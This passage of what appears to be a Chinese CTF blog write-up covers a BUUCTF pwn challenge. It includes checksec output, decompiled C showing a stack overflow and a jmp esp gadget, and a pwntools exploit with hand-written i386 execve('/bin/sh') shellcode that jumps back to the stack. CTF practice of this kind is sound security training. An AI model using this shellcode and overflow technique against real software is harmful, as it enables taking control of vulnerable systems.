<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">❯ checksec pwn</span><br><span class="line">[*] &#x27;/home/pwn/pwn/buuctf/60/pwn&#x27;</span><br><span class="line">    Arch:       i386-32-little</span><br><span class="line">    RELRO:      Partial RELRO</span><br><span class="line">    Stack:      No canary found</span><br><span class="line">    NX:         NX unknown - GNU_STACK missing</span><br><span class="line">    PIE:        No PIE (0x8048000)</span><br><span class="line">    Stack:      Executable</span><br><span class="line">    RWX:        Has RWX segments</span><br><span class="line">    Stripped:   No</span><br><span class="line">    Debuginfo:  Yes</span><br></pre></td></tr></table></figure>

<p>有<code>RWX</code>段,保护全关，估计<code>shellcode</code>,ida看看</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">pwn</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> s[<span class="number">24</span>]; <span class="comment">// [esp+8h] [ebp-20h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;\nHey! ^_^&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;\nIt&#x27;s nice to meet you&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;\nDo you have anything to tell?&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;&gt;&quot;</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  fgets(s, <span class="number">50</span>, <span class="built_in">stdin</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;OK bye~&quot;</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">void</span> <span class="title function_">hint</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  __asm &#123; jmp     esp &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>有一个<code>jmp esp</code>函数，pwn函数里存在溢出点，但总计可以读入0x32字节，不够写<code>shellcraft.sh()</code>，所以要手写</p>
<p>这边梳理一下流程</p>
<p><code>在栈上写入小shellcode-&gt;覆盖返回地址为jmp esp-&gt;让esp指向shellcode-&gt;主动调用esp</code></p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">shellcode = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">xor    eax, eax</span></span><br><span class="line"><span class="string">push   eax</span></span><br><span class="line"><span class="string">push   0x68732f2f</span></span><br><span class="line"><span class="string">push   0x6e69622f</span></span><br><span class="line"><span class="string">mov    ebx, esp</span></span><br><span class="line"><span class="string">mov    ecx, eax</span></span><br><span class="line"><span class="string">mov    edx, eax</span></span><br><span class="line"><span class="string">mov    al, 0xb</span></span><br><span class="line"><span class="string">int    0x80</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span><span class="string">&#x27;</span></span><br><span class="line"><span class="string">shellcode = asm(shellcode)</span></span><br><span class="line"><span class="string">payload = shellcode.ljust(0x24,b&#x27;</span>\x00<span class="string">&#x27;)+p32(0x8048554)</span></span><br><span class="line"><span class="string">payload+=asm(&#x27;</span>sub esp,<span class="number">0x28</span>;call esp<span class="string">&#x27;)	# 0x24+0x4=0x28</span></span><br><span class="line"><span class="string">p.sendline(payload)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">p.interactive()</span></span><br></pre></td></tr></table></figure>




    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8821-40%E9%A2%98%EF%BC%89/" rel="prev" title="">
                  <i class="fa fa-angle-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8861-80%E9%A2%98%EF%BC%89/" rel="next" title="">
                   <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Maple</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
